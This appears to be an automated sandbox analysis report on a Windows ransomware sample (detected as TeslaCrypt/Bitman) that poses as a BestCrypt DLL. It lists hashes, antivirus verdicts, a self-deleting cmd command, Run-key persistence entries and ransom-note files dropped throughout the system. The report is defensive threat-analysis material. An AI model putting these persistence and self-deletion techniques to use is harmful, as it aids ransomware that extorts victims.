Analysis Date2016-02-13 16:13:40
MD5624b549481dc8c112aea4d14666e7aaa
SHA11c89dafb48e99dce0c137a9b30c19c61fc72e139

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f1152e415cd3bba63601dea062932b51 sha1: 22ca94b8af1dff4d4308af6e15fc6d616d7cbad1 size: 42496
Section.rdata md5: 66ec18c299641ffc694d93c6266bbee8 sha1: ae8fad7834d91d1e27491efa7a176f0b211e6853 size: 8704
Section.data md5: 68a5a8e00ba4c2bcfeccfbea7a8d6e08 sha1: 099c8071c9651e79fea010d6560921703a7b692e size: 19456
Section.rsrc md5: 8937e29090d7326f011d42162848ebfc sha1: d31e8f4044b671705c0654f567f212a5ec16abf1 size: 187904
Timestamp2016-02-09 12:59:26
VersionLegalCopyright: Copyright © 1995-2011
InternalName: BestCrypt
FileVersion: 4.02.5
CompanyName: Jetico, Inc.
ProductName: BestCrypt SHELLEXT Dynamic Link Library
ProductVersion: 4.02.5
FileDescription: BestCrypt Shell Extension DLL
OriginalFilename: BCShExt.DLL
PackerMicrosoft Visual C++ ?.?
PEhash3ed73c8bf1560a84dc29f4667c9749a03c8a8a1d
IMPhashfc2a2932afa1f7ca2bd06365b610a4bc
AVCA (E-Trust Ino)Gen:Variant.Zusy.181392
AVRisingNo Virus
AVMcafeeNo Virus
AVAvira (antivir)TR/Crypt.Xpack.446234
AVTwisterNo Virus
AVAd-AwareGen:Variant.Zusy.181392
AVAlwil (avast)No Virus
AVEset (nod32)Win32/Kryptik.ENIU
AVGrisoft (avg)Generic_r.HGF
AVSymantecNo Virus
AVFortinetW32/Kryptik.ENFX!tr
AVBitDefenderGen:Variant.Zusy.181392
AVK7Trojan ( 004dddb21 )
AVMicrosoft Security EssentialsRansom:Win32/Tescrypt.E
AVMicroWorld (escan)No Virus
AVMalwareBytesRansom.TeslaCrypt
AVAuthentiumW32/Rovnix.C.gen!Eldorado
AVEmsisoftGen:Variant.Zusy.181392
AVFrisk (f-prot)No Virus
AVIkarusTrojan.Win32.Crypt
AVZillya!No Virus
AVKasperskyTrojan-Ransom.Win32.Bitman.ijp
AVTrend MicroNo Virus
AVVirusBlokAda (vba32)No Virus
AVCAT (quickheal)No Virus
AVBullGuardNo Virus
AVArcabit (arcavir)Gen:Variant.Zusy.181392
AVClamAVNo Virus
AVDr. WebTrojan.Encoder.3817
AVF-SecureGen:Variant.Zusy.181392

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\aayleir.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c DEL C:\1C89DA~1.EXE
Creates ProcessC:\Documents and Settings\Administrator\Application Data\aayleir.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\1C89DA~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\aayleir.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\aayleir.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝
C:\Documents and Settings\Administrator\Application Data\aayleir.exe\\x00
RegistryHKEY_CURRENT_USER\Software\xxxsys\ID ➝
NULL
RegistryHKEY_CURRENT_USER\Software\89069569EEF5AA0\data ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Favorites\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.html
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\NetHood\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Templates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Start Menu\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Templates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Cookies\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_cqneiefnk.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\PrintHood\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Recent\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\PrintHood\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\9.0\Collab\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Templates\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\LocalService\Application Data\Adobe\Acrobat\9.0\Collab\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\LocalService\Application Data\AdobeUM\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Default User\Start Menu\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\My Documents\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Favorites\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\LocalService\Application Data\AdobeUM\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Default User\SendTo\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Templates\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Default User\Recent\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hhj.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+hhj.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Administrator\Templates\wordpfct.wpd
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hhj.html
Creates FileC:\Documents and Settings\Default User\Templates\HELP_RECOVER_instructions+hhj.txt
